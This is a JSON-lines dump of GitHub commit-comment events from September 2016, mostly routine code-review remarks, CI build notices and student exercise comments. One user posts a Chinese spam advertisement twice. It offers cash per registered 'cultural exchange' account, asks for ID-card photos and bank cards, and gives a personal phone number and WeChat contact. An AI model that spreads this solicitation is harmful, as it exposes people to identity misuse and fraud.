{"id":"4608929529","type":"CommitCommentEvent","actor":{"login":"zhongwenchun"},"repo":{"name":"zhongwenchun/wenchun.github.io"},"payload":{"comment":{"id":19147196,"position":2,"line":null,"path":"README.md","commit_id":"d5e2f423fd521bfb116371c86eb4943989230cd7","created_at":"2016-09-23T14:37:07Z","updated_at":"2016-09-23T14:37:07Z","body":"#诚招代理：文化交易所账号代理。\n\n##推荐身边的朋友注册账号，每注册成功一个返现25元给你，如果自己注册30元一个。如果推荐的朋友再注册，也算你的。开户不算复杂，有详细说明步骤。\n\n#开户要求:\n1：身份证正面照片(要清晰，不然可能审核不通过)\n2：接受审核通知的手机号码\n3：开通了网上支付的银行卡(所有注册交易所都要的)\n最好是平安银行、建设银行、工商银行的。\n\n以上这些就可以了\n。。。。。。。。。。。。。。。。。。\n详询↓\n#联系电话：15013873121\n#微信：wenchun676"}},"created_at":"2016-09-23T14:37:07Z"}
{"id":"4608930581","type":"CommitCommentEvent","actor":{"login":"ARodriguez97"},"repo":{"name":"ARodriguez97/Repositorio_Daw_2"},"payload":{"comment":{"id":19147197,"position":null,"line":null,"path":null,"commit_id":"c6cf59e200998462dc8a93c9ea006cf24b66e490","created_at":"2016-09-23T14:37:18Z","updated_at":"2016-09-23T14:37:18Z","body":"Espaciado <br>\r\n"}},"created_at":"2016-09-23T14:37:18Z"}
{"id":"4608932301","type":"CommitCommentEvent","actor":{"login":"xtne6f"},"repo":{"name":"xtne6f/EDCB"},"payload":{"comment":{"id":19147201,"position":null,"line":null,"path":null,"commit_id":"efc76df260c8dc1865cbf27477bd4d7941a0b545","created_at":"2016-09-23T14:37:35Z","updated_at":"2016-09-23T14:37:35Z","body":"ありがとうございます\r\n別の問題が見つかってコメント確認前にRevertしてしまいましたが、2010ではコンパイルエラーになるんですね\r\n(これ系の問題か http://d.hatena.ne.jp/pknight/20130131/1359664446 )\r\n値型ではまだthisが完成していないことになっててダメってことかな…不可解な…"}},"created_at":"2016-09-23T14:37:35Z"}
{"id":"4608933071","type":"CommitCommentEvent","actor":{"login":"rolfbjarne"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":19147204,"position":null,"line":null,"path":null,"commit_id":"3f42f6cb633da62cf802c130e22246125580bfcb","created_at":"2016-09-23T14:37:43Z","updated_at":"2016-09-23T14:37:43Z","body":"Exactly what are you trying to do here? `@MonkeyWrench:` takes a set of commands, which is not what you're doing."}},"created_at":"2016-09-23T14:37:43Z"}
{"id":"4608936123","type":"CommitCommentEvent","actor":{"login":"nominalaeon"},"repo":{"name":"jcjmcclean/guides"},"payload":{"comment":{"id":19147214,"position":5,"line":48,"path":"css/basic-conventions.md","commit_id":"398fb0a06bb61745ee2131a0513c26da1eba4a0e","created_at":"2016-09-23T14:38:15Z","updated_at":"2016-09-23T14:38:15Z","body":"Dude, good call! Move them from #4 to #6 and that is how I write it. Here's a blurb starter if you want to go all the way with an explanation section, \"Ideally these can be avoided all together with BEM modifier classes but they do happen. Since they'll have nested selectors of their own, they're an easier read after the Pseudo-elements but before the Nested Elements.\""}},"created_at":"2016-09-23T14:38:15Z"}
{"id":"4608936619","type":"CommitCommentEvent","actor":{"login":"AleksCore"},"repo":{"name":"JarnoVgr/Mr.Green-MTA-Resources"},"payload":{"comment":{"id":19147215,"position":null,"line":null,"path":null,"commit_id":"910ddb10f531b8d974a640de1f7c25a955038461","created_at":"2016-09-23T14:38:20Z","updated_at":"2016-09-23T14:38:20Z","body":"seems like it doesn't works for some reason :O"}},"created_at":"2016-09-23T14:38:20Z"}
{"id":"4608938575","type":"CommitCommentEvent","actor":{"login":"rwmcbain"},"repo":{"name":"rwmcbain/relaxr"},"payload":{"comment":{"id":19147224,"position":null,"line":null,"path":null,"commit_id":"0e3eda95064dccc9d7d3325b67fdfa6482e901e0","created_at":"2016-09-23T14:38:41Z","updated_at":"2016-09-23T14:38:41Z","body":"I did not read all of the instructions. I thought we were supposed to just make the page in the screenshot :(\r\n\r\n3/5 - I'm going to work on it this weekend to try to complete it."}},"created_at":"2016-09-23T14:38:41Z"}
{"id":"4608939248","type":"CommitCommentEvent","actor":{"login":"nominalaeon"},"repo":{"name":"jcjmcclean/guides"},"payload":{"comment":{"id":19147226,"position":29,"line":186,"path":"css/basic-conventions.md","commit_id":"398fb0a06bb61745ee2131a0513c26da1eba4a0e","created_at":"2016-09-23T14:38:49Z","updated_at":"2016-09-23T14:38:49Z","body":"This was probably a victim of timing between our commits, could you keep it in though please"}},"created_at":"2016-09-23T14:38:49Z"}
{"id":"4608940637","type":"CommitCommentEvent","actor":{"login":"9199joan23"},"repo":{"name":"9199joan23/MiprimerRepositorio"},"payload":{"comment":{"id":19147228,"position":null,"line":null,"path":null,"commit_id":"b7040d18ec96a434d69f595328fad381c20f964b","created_at":"2016-09-23T14:39:04Z","updated_at":"2016-09-23T14:39:04Z","body":"Yo he modificado mi  linea  de  texto\r\n"}},"created_at":"2016-09-23T14:39:04Z"}
{"id":"4608941342","type":"CommitCommentEvent","actor":{"login":"MarcPetit92"},"repo":{"name":"MarcPetit92/MiPrimerRepositorio"},"payload":{"comment":{"id":19147230,"position":null,"line":null,"path":null,"commit_id":"70bff3b07314b84f30460cecebdc0b4eef8a63dc","created_at":"2016-09-23T14:39:11Z","updated_at":"2016-09-23T14:39:11Z","body":"estoy comentado esta modificación"}},"created_at":"2016-09-23T14:39:11Z"}
{"id":"4608941457","type":"CommitCommentEvent","actor":{"login":"zhongwenchun"},"repo":{"name":"zhongwenchun/wenchun.github.io"},"payload":{"comment":{"id":19147231,"position":null,"line":null,"path":null,"commit_id":"d5e2f423fd521bfb116371c86eb4943989230cd7","created_at":"2016-09-23T14:39:12Z","updated_at":"2016-09-23T14:39:12Z","body":"\n#诚招代理：文化交易所账号代理。\n\n##推荐身边的朋友注册账号，每注册成功一个返现25元给你，如果自己注册30元一个。如果推荐的朋友再注册，也算你的。开户不算复杂，有详细说明步骤。\n\n#开户要求:\n1：身份证正面照片(要清晰，不然可能审核不通过)\n2：接受审核通知的手机号码\n3：开通了网上支付的银行卡(所有注册交易所都要的)\n最好是平安银行、建设银行、工商银行的。\n\n以上这些就可以了\n。。。。。。。。。。。。。。。。。。\n详询↓\n#联系电话：15013873121\n#微信：wenchun676"}},"created_at":"2016-09-23T14:39:12Z"}
{"id":"4608942402","type":"CommitCommentEvent","actor":{"login":"nominalaeon"},"repo":{"name":"jcjmcclean/guides"},"payload":{"comment":{"id":19147232,"position":null,"line":null,"path":null,"commit_id":"398fb0a06bb61745ee2131a0513c26da1eba4a0e","created_at":"2016-09-23T14:39:22Z","updated_at":"2016-09-23T14:39:22Z","body":"Can't wait for the PR, sir, thank you for the assist!"}},"created_at":"2016-09-23T14:39:22Z"}
{"id":"4608946485","type":"CommitCommentEvent","actor":{"login":"ytuza"},"repo":{"name":"ytuza/ccomp2"},"payload":{"comment":{"id":19147238,"position":null,"line":null,"path":null,"commit_id":"8a2f6cba37df898ccebe86041d3d99e99d8a5fe8","created_at":"2016-09-23T14:40:02Z","updated_at":"2016-09-23T14:40:02Z","body":"\nchar *\nstrncpy(char *s1, const char *s2, size_t n)\n{\n    char *s = s1;\n    while (n > 0 && *s2 != '\\0') {\n\t*s++ = *s2++;\n\t--n;\n    }\n    while (n > 0) {\n\t*s++ = '\\0';\n\t--n;\n    }\n    return s1;\n}"}},"created_at":"2016-09-23T14:40:02Z"}
{"id":"4608952259","type":"CommitCommentEvent","actor":{"login":"Taskim"},"repo":{"name":"FRoGbis/pli-css-training"},"payload":{"comment":{"id":19147250,"position":6,"line":6,"path":"front/Error/Error.jsx","commit_id":"07339def2dfe991ae76919971821cab9633dca91","created_at":"2016-09-23T14:40:58Z","updated_at":"2016-09-23T14:40:58Z","body":"ne pas oublier de virer les commentaires ;)\r\n"}},"created_at":"2016-09-23T14:40:58Z"}
{"id":"4608952740","type":"CommitCommentEvent","actor":{"login":"digikidd"},"repo":{"name":"digikidd/kbc-api-hack"},"payload":{"comment":{"id":19147252,"position":null,"line":null,"path":null,"commit_id":"85ba2468206e4b26b49d655d17cc2518f2b08770","created_at":"2016-09-23T14:41:03Z","updated_at":"2016-09-23T14:41:03Z","body":"Changed the background color attribute to an rgba property so the opacity is correct on the element."}},"created_at":"2016-09-23T14:41:03Z"}
{"id":"4608956962","type":"CommitCommentEvent","actor":{"login":"nominalaeon"},"repo":{"name":"jcjmcclean/guides"},"payload":{"comment":{"id":19147262,"position":5,"line":148,"path":"css/basic-conventions.md","commit_id":"fbb716c1ec93c54c92afb95d909e74425e23866b","created_at":"2016-09-23T14:41:45Z","updated_at":"2016-09-23T14:41:45Z","body":"[animated gif of my head exploding and rainbow guts landing everywhere.]\r\n\r\nReally wish someone had dropped this on me ten years ago!"}},"created_at":"2016-09-23T14:41:45Z"}
{"id":"4608958324","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19147264,"position":null,"line":null,"path":null,"commit_id":"38192b6f518d7ddc146305ca6ea879a491da76b3","created_at":"2016-09-23T14:41:58Z","updated_at":"2016-09-23T14:41:58Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1150](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14161&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-23T14:41:58Z"}
{"id":"4608960846","type":"CommitCommentEvent","actor":{"login":"Taskim"},"repo":{"name":"FRoGbis/pli-css-training"},"payload":{"comment":{"id":19147270,"position":13,"line":13,"path":"front/Error/Error.jsx","commit_id":"07339def2dfe991ae76919971821cab9633dca91","created_at":"2016-09-23T14:42:24Z","updated_at":"2016-09-23T14:42:24Z","body":"syntaxe es6 pour la concaténation de string et variable:\r\n`${variable} string`"}},"created_at":"2016-09-23T14:42:24Z"}
{"id":"4608962077","type":"CommitCommentEvent","actor":{"login":"mlopezgalan"},"repo":{"name":"mlopezgalan/PrimerRepositorioPrueba"},"payload":{"comment":{"id":19147274,"position":null,"line":null,"path":null,"commit_id":"6f9b4c335721ead33b759d1ee7752f2e71ae2c05","created_at":"2016-09-23T14:42:38Z","updated_at":"2016-09-23T14:42:38Z","body":"Prueba de substitución de enlace"}},"created_at":"2016-09-23T14:42:38Z"}
{"id":"4608963286","type":"CommitCommentEvent","actor":{"login":"vfremaux"},"repo":{"name":"vfremaux/moodle-availability_coursetime"},"payload":{"comment":{"id":19147280,"position":null,"line":null,"path":null,"commit_id":"083996868cf1806383feddf59d5ee369587f0533","created_at":"2016-09-23T14:42:50Z","updated_at":"2016-09-23T14:42:50Z","body":"Hi Dan I'm starting ome expeiments in travis. Seems great toolkit indeed. \r\n\r\nCould you tell me about this line : \r\ncomposer create-project -n --no-dev moodlerooms/moodle-plugin-ci ci ^1\r\nwhat it does refeed to moodlerooms context ? "}},"created_at":"2016-09-23T14:42:50Z"}
{"id":"4608964786","type":"CommitCommentEvent","actor":{"login":"flavvita"},"repo":{"name":"Pronatec-Unit/Bibliotec"},"payload":{"comment":{"id":19147281,"position":null,"line":null,"path":null,"commit_id":"a1caa3ef0c91f7fa279ed45a5a8589966ee3f647","created_at":"2016-09-23T14:43:06Z","updated_at":"2016-09-23T14:43:06Z","body":"https://www.youtube.com/watch?v=KvuKAmHnJrw"}},"created_at":"2016-09-23T14:43:06Z"}
{"id":"4608966641","type":"CommitCommentEvent","actor":{"login":"Taskim"},"repo":{"name":"FRoGbis/pli-css-training"},"payload":{"comment":{"id":19147283,"position":14,"line":14,"path":"front/Error/Error.jsx","commit_id":"07339def2dfe991ae76919971821cab9633dca91","created_at":"2016-09-23T14:43:24Z","updated_at":"2016-09-23T14:43:24Z","body":"pas de `<a href=\"\">` sur react\r\nregarde du côté de `import { Link } from 'react-router';`"}},"created_at":"2016-09-23T14:43:24Z"}
{"id":"4608974371","type":"CommitCommentEvent","actor":{"login":"DonJayamanne"},"repo":{"name":"DonJayamanne/pythonVSCode"},"payload":{"comment":{"id":19147304,"position":null,"line":null,"path":null,"commit_id":"8f6c26d8fb392984148756c18e92d3737c5d821b","created_at":"2016-09-23T14:44:44Z","updated_at":"2016-09-23T14:44:44Z","body":"@gandhis1 , thanks for the feedback.\r\nYou can download the master branch and have a look at what's been developed for now. It is fully functional (provided you have jupyter or ipython installed and it is in your path)."}},"created_at":"2016-09-23T14:44:44Z"}
{"id":"4608977615","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19147320,"position":47,"line":63,"path":"compiler/frontend/src/org/jetbrains/kotlin/resolve/ClassifierUsageChecker.kt","commit_id":"6a209a70aeb2316e02ee6ee18aa1f84b859901bc","created_at":"2016-09-23T14:45:04Z","updated_at":"2016-09-23T14:45:04Z","body":"Probably `KtTreeVisitorVoid` or even `org.jetbrains.kotlin.psi.psiUtil.forEachDescendantOfTypeVisitor` could be used"}},"created_at":"2016-09-23T14:45:04Z"}
{"id":"4608980333","type":"CommitCommentEvent","actor":{"login":"Taskim"},"repo":{"name":"FRoGbis/pli-css-training"},"payload":{"comment":{"id":19147333,"position":null,"line":null,"path":null,"commit_id":"07339def2dfe991ae76919971821cab9633dca91","created_at":"2016-09-23T14:45:32Z","updated_at":"2016-09-23T14:45:32Z","body":"On va aussi éviter d'importer une deuxième fois la même image, vaut mieux faire un dossier commun /shared/images/ par exemple à la racine, et modifier sur la landing et sur error les chemins d'accès pour taper dessus ;)\r\n"}},"created_at":"2016-09-23T14:45:32Z"}
{"id":"4608982837","type":"CommitCommentEvent","actor":{"login":"salcode"},"repo":{"name":"Project-Name/supreme-waddle"},"payload":{"comment":{"id":19147340,"position":null,"line":null,"path":null,"commit_id":"246d183bb304fcad88c02331da0109d76274b221","created_at":"2016-09-23T14:45:58Z","updated_at":"2016-09-23T14:45:58Z","body":"I'm glad to hear you found this file helpful.  Thanks for the shoutout.  😀 "}},"created_at":"2016-09-23T14:45:58Z"}
{"id":"4608989753","type":"CommitCommentEvent","actor":{"login":"sethaj"},"repo":{"name":"mlibrary/heliotrope"},"payload":{"comment":{"id":19147359,"position":null,"line":null,"path":null,"commit_id":"6316d6667b314007ce8b94fdb7a0c032089fe0bc","created_at":"2016-09-23T14:47:09Z","updated_at":"2016-09-23T14:47:09Z","body":"Somehow this commit caused problems with asset:precompile in production. I'm not sure which of the many gem updates might have caused this. Reverting the whole thing to sort it out."}},"created_at":"2016-09-23T14:47:09Z"}
{"id":"4608993659","type":"CommitCommentEvent","actor":{"login":"P3pp3rF1y"},"repo":{"name":"P3pp3rF1y/Reliquary"},"payload":{"comment":{"id":19147368,"position":null,"line":null,"path":null,"commit_id":"d00117a5c50efae8e669ad3df2d4ce687b2e08b0","created_at":"2016-09-23T14:47:50Z","updated_at":"2016-09-23T14:47:50Z","body":"Fixes #166 "}},"created_at":"2016-09-23T14:47:50Z"}
{"id":"4608994773","type":"CommitCommentEvent","actor":{"login":"dsblank"},"repo":{"name":"gramps-project/gramps"},"payload":{"comment":{"id":19147372,"position":null,"line":null,"path":null,"commit_id":"a9f137752938aa067a570f104dbbd8e8a360943b","created_at":"2016-09-23T14:48:02Z","updated_at":"2016-09-23T14:48:02Z","body":"Thanks! Fixed in 9e5f899bbd529c27e2ab3210ec28a25b82c4bc2c"}},"created_at":"2016-09-23T14:48:02Z"}
{"id":"4608999747","type":"CommitCommentEvent","actor":{"login":"TheDiamondYT1"},"repo":{"name":"minecrafter/voxelwind"},"payload":{"comment":{"id":19147384,"position":5,"line":126,"path":"api/src/main/java/com/voxelwind/api/server/event/block/BlockReplaceEvent.java","commit_id":"fe8d1cebd2aa3a61216b81524f39d76aea5ac99d","created_at":"2016-09-23T14:48:50Z","updated_at":"2016-09-23T14:48:50Z","body":"https://gitter.im/minecrafter/voxelwind"}},"created_at":"2016-09-23T14:48:50Z"}
{"id":"4609005028","type":"CommitCommentEvent","actor":{"login":"meandus"},"repo":{"name":"sonata-project/SonataMediaBundle"},"payload":{"comment":{"id":19147402,"position":null,"line":null,"path":null,"commit_id":"b7131f396ed6effe007368520418304c09c71815","created_at":"2016-09-23T14:49:44Z","updated_at":"2016-09-23T14:49:44Z","body":"This modification is very important to continue to push image or file. Please commit to master branch !"}},"created_at":"2016-09-23T14:49:44Z"}
{"id":"4609005428","type":"CommitCommentEvent","actor":{"login":"EllieAtWHL"},"repo":{"name":"EllieAtWHL/ManageProductScheduling"},"payload":{"comment":{"id":19147404,"position":null,"line":null,"path":null,"commit_id":"b36d0e5cc52454c1336a218bd6f8277b919c3245","created_at":"2016-09-23T14:49:49Z","updated_at":"2016-09-23T14:49:49Z","body":"No longer required second page as now a one stop shop"}},"created_at":"2016-09-23T14:49:49Z"}
{"id":"4609010343","type":"CommitCommentEvent","actor":{"login":"windbender"},"repo":{"name":"andsel/moquette"},"payload":{"comment":{"id":19147416,"position":13,"line":96,"path":"broker/src/main/java/io/moquette/spi/IMessagesStore.java","commit_id":"4d637a349b78497243a51c7f312a8cd184588165","created_at":"2016-09-23T14:50:40Z","updated_at":"2016-09-23T14:50:40Z","body":"@andsel   should the ref count not be either an AtomicInteger  or via protected via \"synchronized\"   ?"}},"created_at":"2016-09-23T14:50:40Z"}
{"id":"4609012905","type":"CommitCommentEvent","actor":{"login":"mhuusko5"},"repo":{"name":"spotify/ios-sdk"},"payload":{"comment":{"id":19147420,"position":4,"line":4,"path":"CHANGELOG.md","commit_id":"44c6536c3a822abe3bfd4f595d00b51819649ac1","created_at":"2016-09-23T14:51:07Z","updated_at":"2016-09-23T14:51:07Z","body":"Incredibly excited to hear about this upcoming separation!"}},"created_at":"2016-09-23T14:51:07Z"}
{"id":"4609014590","type":"CommitCommentEvent","actor":{"login":"syhily"},"repo":{"name":"zhangfeng86911/orange"},"payload":{"comment":{"id":19147423,"position":10,"line":26,"path":"conf/nginx.conf","commit_id":"679bde08353e462f885d59034363921d7e1e0caa","created_at":"2016-09-23T14:51:24Z","updated_at":"2016-09-23T14:51:24Z","body":"这种配置的变更不要提交。"}},"created_at":"2016-09-23T14:51:24Z"}
{"id":"4609015552","type":"CommitCommentEvent","actor":{"login":"rybakit"},"repo":{"name":"tarantool/doc"},"payload":{"comment":{"id":19147429,"position":21,"line":62,"path":"sphinx/book/connectors/__php.rst","commit_id":"def33e71cc369b05d806b15f6af86291b72c7332","created_at":"2016-09-23T14:51:34Z","updated_at":"2016-09-23T14:51:34Z","body":"I'm afraid that \"wrapper\" is a wrong word here, as it means completely different concept in the programming world. /cc @nekufa"}},"created_at":"2016-09-23T14:51:34Z"}
{"id":"4609019973","type":"CommitCommentEvent","actor":{"login":"lsh-0"},"repo":{"name":"elifesciences/builder"},"payload":{"comment":{"id":19147439,"position":null,"line":null,"path":null,"commit_id":"95590d5fd7e8ec462bf349c9dbbd87696f38b485","created_at":"2016-09-23T14:52:21Z","updated_at":"2016-09-23T14:52:21Z","body":"I bet that `-d` in the first process means 'daemonize'. upstart\nhandles running processes as daemons, so it might be escaping death\nthat way ...\n\nOn Fri, Sep 23, 2016 at 3:48 PM, Giorgio Sironi\n<notifications@github.com> wrote:\n> Go for the kill\n>\n> I often see situation on the salt-master like this:\n> ```\n> 10094 ?        Sl     0:00 /usr/bin/python /usr/bin/salt-master -d\n> 13496 ?        Ss     0:00 /usr/bin/python /usr/bin/salt-master\n> 13506 ?        S      0:00  \\_ /usr/bin/python /usr/bin/salt-master\n> 13507 ?        Sl     0:00  \\_ /usr/bin/python /usr/bin/salt-master\n> 13508 ?        S      0:00  \\_ /usr/bin/python /usr/bin/salt-master\n> 13511 ?        S      0:01  \\_ /usr/bin/python /usr/bin/salt-master\n> 13561 ?        Sl     0:02  \\_ /usr/bin/python /usr/bin/salt-master\n> 13562 ?        S      0:00  \\_ /usr/bin/python /usr/bin/salt-master\n> 13563 ?        Sl     0:00      \\_ /usr/bin/python /usr/bin/salt-master\n> 13566 ?        Sl     0:00      \\_ /usr/bin/python /usr/bin/salt-master\n> 13567 ?        Sl     0:00      \\_ /usr/bin/python /usr/bin/salt-master\n> 13580 ?        Sl     0:00      \\_ /usr/bin/python /usr/bin/salt-master\n> 13584 ?        Sl     0:00      \\_ /usr/bin/python /usr/bin/salt-master\n> 13585 ?        Sl     0:00      \\_ /usr/bin/python /usr/bin/salt-master\n> elife@ip-10-0-2-71:~$ ps -p 10094 -o etime=\n> 46:29\n> elife@ip-10-0-2-71:~$ ps -p 13496 -o etime=\n> 19:28\n> ```\n> The first process listed seems to have survived the restart. I don't\n> know where it is coming from, but I'd try a more thourough killing with\n> SIGKILL instead of the default SIGTERM.\n>\n> /cc @lsh-0\n>\n> --\n> You are receiving this because you were mentioned.\n> Reply to this email directly or view it on GitHub:\n> https://github.com/elifesciences/builder/commit/95590d5fd7e8ec462bf349c9dbbd87696f38b485\n\n\n\n-- \n\nLuke Skibinski\n\nFormally defined,\nExtensively tested,\nCryptic, abstract, thing.\n\n--\n\neLife Sciences Publications, Ltd is a limited liability non-profit\nnon-stock corporation incorporated in the State of Delaware, USA, with\ncompany number 5030732, and is registered in the UK with company\nnumber FC030576 and branch number BR015634 at the address First Floor,\n24 Hills Road, Cambridge CB2 1JP.\n"}},"created_at":"2016-09-23T14:52:21Z"}
{"id":"4609023919","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19147449,"position":null,"line":null,"path":null,"commit_id":"38192b6f518d7ddc146305ca6ea879a491da76b3","created_at":"2016-09-23T14:53:00Z","updated_at":"2016-09-23T14:53:00Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1150](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14161&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 260, ignored: 3 Build time: 00:11:02"}},"created_at":"2016-09-23T14:53:00Z"}
{"id":"4609024655","type":"CommitCommentEvent","actor":{"login":"damon-atkins"},"repo":{"name":"terminalmage/salt"},"payload":{"comment":{"id":19147450,"position":null,"line":null,"path":null,"commit_id":"f237fe4d528efd621e1f9adbeb149695e94e65a1","created_at":"2016-09-23T14:53:08Z","updated_at":"2016-09-23T14:53:08Z","body":"Just need\r\nL425 refresh = Logic From \r\n```\r\n    # winrepo_age is -1 if repo db does not exist\r\n    refresh = True if force \\\r\n        or repo_details.winrepo_age == -1 \\\r\n        or repo_details.winrepo_age > expired_max \\\r\n        else False\r\n```\r\nTo Become \r\n```\r\n    # winrepo_age is -1 if repo db does not exist\r\n    refresh = True if (force and (expired_min == 0 or repo_details.winrepo_age < expired_min)) \\\r\n        or repo_details.winrepo_age == -1 \\\r\n        or repo_details.winrepo_age > expired_max \\\r\n        else False\r\n```\r\ntwangboy happy for get_name_map() to become private function."}},"created_at":"2016-09-23T14:53:08Z"}
{"id":"4609024957","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19147451,"position":null,"line":null,"path":null,"commit_id":"9762cdada05f18a0b193f1ab4e9687cb87d924c7","created_at":"2016-09-23T14:53:11Z","updated_at":"2016-09-23T14:53:11Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1151](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14166&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-23T14:53:11Z"}
{"id":"4609025350","type":"CommitCommentEvent","actor":{"login":"DavidLibeau"},"repo":{"name":"DavidLibeau/WebCard"},"payload":{"comment":{"id":19147452,"position":35,"line":96,"path":"www/css/style.css","commit_id":"eac6a937a38ee4e476c709329a139204d247e673","created_at":"2016-09-23T14:53:15Z","updated_at":"2016-09-23T14:53:15Z","body":"-5"}},"created_at":"2016-09-23T14:53:15Z"}
{"id":"4609028104","type":"CommitCommentEvent","actor":{"login":"DarkWav"},"repo":{"name":"Inactive-to-Reactive/ImagicalMine"},"payload":{"comment":{"id":19147461,"position":null,"line":null,"path":null,"commit_id":"990b35518bcd2ad6fef0deb7cab6b81b756147c2","created_at":"2016-09-23T14:53:43Z","updated_at":"2016-09-23T14:53:43Z","body":"YAY! works."}},"created_at":"2016-09-23T14:53:43Z"}
{"id":"4609029347","type":"CommitCommentEvent","actor":{"login":"shaunquinton"},"repo":{"name":"shaunquinton/Queue-vs-Stack"},"payload":{"comment":{"id":19147466,"position":null,"line":null,"path":null,"commit_id":"53e367119d058df0ef81a643fe686a22219da239","created_at":"2016-09-23T14:53:56Z","updated_at":"2016-09-23T14:53:56Z","body":"# Take Home Points\r\n\r\n## Queue \r\n\r\n- Think about what the word Queue means. In programming, a queue means that things are lined up and the first ones in line are the first ones to leave. This is what is commonly referred to as FIFO (first in first out)\r\n"}},"created_at":"2016-09-23T14:53:56Z"}
{"id":"4609029747","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19147467,"position":24,"line":40,"path":"compiler/frontend/src/org/jetbrains/kotlin/resolve/ClassifierUsageChecker.kt","commit_id":"6a209a70aeb2316e02ee6ee18aa1f84b859901bc","created_at":"2016-09-23T14:54:00Z","updated_at":"2016-09-23T14:54:00Z","body":"I'd rewrite it like:\r\n```\r\nval target = \r\n   trace.bindingContext.get(BindingContext.REFERENCE_TARGET, expression) as? ClassifierDescriptor \r\n   ?: return null\r\n```\r\nbut it's of course a matter of taste"}},"created_at":"2016-09-23T14:54:00Z"}
{"id":"4609031274","type":"CommitCommentEvent","actor":{"login":"boynton06"},"repo":{"name":"boynton06/2048-"},"payload":{"comment":{"id":19147475,"position":null,"line":null,"path":null,"commit_id":"1ab4dc851c72b41579e6061af5192f4861672ca4","created_at":"2016-09-23T14:54:13Z","updated_at":"2016-09-23T14:54:13Z","body":"Published\r\n"}},"created_at":"2016-09-23T14:54:13Z"}
{"id":"4609033512","type":"CommitCommentEvent","actor":{"login":"pawaitemadisoncollege"},"repo":{"name":"aalhassan/T3Online"},"payload":{"comment":{"id":19147482,"position":null,"line":null,"path":null,"commit_id":"76facb4c087291b4d8664eb1a81d9e37de3e85b0","created_at":"2016-09-23T14:54:35Z","updated_at":"2016-09-23T14:54:35Z","body":"Looks like you have a start on your daos. How about unit tests for the methods in those daos? "}},"created_at":"2016-09-23T14:54:35Z"}
{"id":"4609033589","type":"CommitCommentEvent","actor":{"login":"angmatalv"},"repo":{"name":"angmatalv/hello-world"},"payload":{"comment":{"id":19147483,"position":null,"line":null,"path":null,"commit_id":"de355d56530551bd8c08073ea55e6c06dde93865","created_at":"2016-09-23T14:54:35Z","updated_at":"2016-09-23T14:54:35Z","body":"Perf "}},"created_at":"2016-09-23T14:54:35Z"}
{"id":"4609035135","type":"CommitCommentEvent","actor":{"login":"andybak"},"repo":{"name":"DjangoAdminHackers/django-admin-row-actions"},"payload":{"comment":{"id":19147487,"position":null,"line":null,"path":null,"commit_id":"b984a11e0ffc1b2dddf84cd543ed26bbf9444610","created_at":"2016-09-23T14:54:51Z","updated_at":"2016-09-23T14:54:51Z","body":"Note to self: this needs documentation"}},"created_at":"2016-09-23T14:54:51Z"}
{"id":"4609037772","type":"CommitCommentEvent","actor":{"login":"andybak"},"repo":{"name":"DjangoAdminHackers/django-admin-row-actions"},"payload":{"comment":{"id":19147495,"position":null,"line":null,"path":null,"commit_id":"dff532127de8ed17396d2f6b3f77052ab421c536","created_at":"2016-09-23T14:55:17Z","updated_at":"2016-09-23T14:55:17Z","body":"Note to self: this needs documentation"}},"created_at":"2016-09-23T14:55:17Z"}
{"id":"4609041988","type":"CommitCommentEvent","actor":{"login":"diaojunxian"},"repo":{"name":"openatx/facebook-wda"},"payload":{"comment":{"id":19147505,"position":3,"line":120,"path":"wda/__init__.py","commit_id":"d67add6f10ee7c3161cfdd0e86512454d00d6855","created_at":"2016-09-23T14:56:02Z","updated_at":"2016-09-23T14:56:02Z","body":"看了你和他的对话，是为了节省应用启动的什么时间吗？"}},"created_at":"2016-09-23T14:56:02Z"}
{"id":"4609043490","type":"CommitCommentEvent","actor":{"login":"ninhnv-runsystem"},"repo":{"name":"ninhnv-runsystem/developersdatabse"},"payload":{"comment":{"id":19147508,"position":null,"line":null,"path":null,"commit_id":"a31c50a23afcebb1b5c49f355966cba549ccb958","created_at":"2016-09-23T14:56:17Z","updated_at":"2016-09-23T14:56:17Z","body":"yeah"}},"created_at":"2016-09-23T14:56:17Z"}
{"id":"4609044296","type":"CommitCommentEvent","actor":{"login":"eriukristene"},"repo":{"name":"githubschool/open-enrollment-classes-introduction-to-github"},"payload":{"comment":{"id":19147512,"position":null,"line":null,"path":null,"commit_id":"f5feb41922c27f9c4315dc92b516ab7edde4f4e2","created_at":"2016-09-23T14:56:25Z","updated_at":"2016-09-23T14:56:25Z","body":"I added my pin to the map @githubteacher "}},"created_at":"2016-09-23T14:56:25Z"}
{"id":"4609049527","type":"CommitCommentEvent","actor":{"login":"xdevs23"},"repo":{"name":"MSF-Jarvis/KPSConnect"},"payload":{"comment":{"id":19147524,"position":null,"line":null,"path":null,"commit_id":"7883a3c1ebbc4c7c212d7d6db78029f62f0e61da","created_at":"2016-09-23T14:57:19Z","updated_at":"2016-09-23T14:57:19Z","body":"where did u pick that from xD cornowser?"}},"created_at":"2016-09-23T14:57:19Z"}
